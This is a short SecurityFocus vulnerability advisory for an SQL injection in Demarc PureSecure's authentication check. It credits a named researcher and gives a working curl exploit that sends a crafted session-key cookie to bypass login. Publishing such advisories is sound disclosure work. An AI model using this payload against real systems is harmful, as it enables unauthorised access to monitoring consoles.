Demarc PureSecure Authentication Check SQL Injection Vulnerability

The following exploit using curl has been provided by pokleyzz sakamaniaka <pokleyzz@hotmail.com>:

curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<lame host>/dm/demarc


 

Privacy Statement
Copyright 2010, SecurityFocus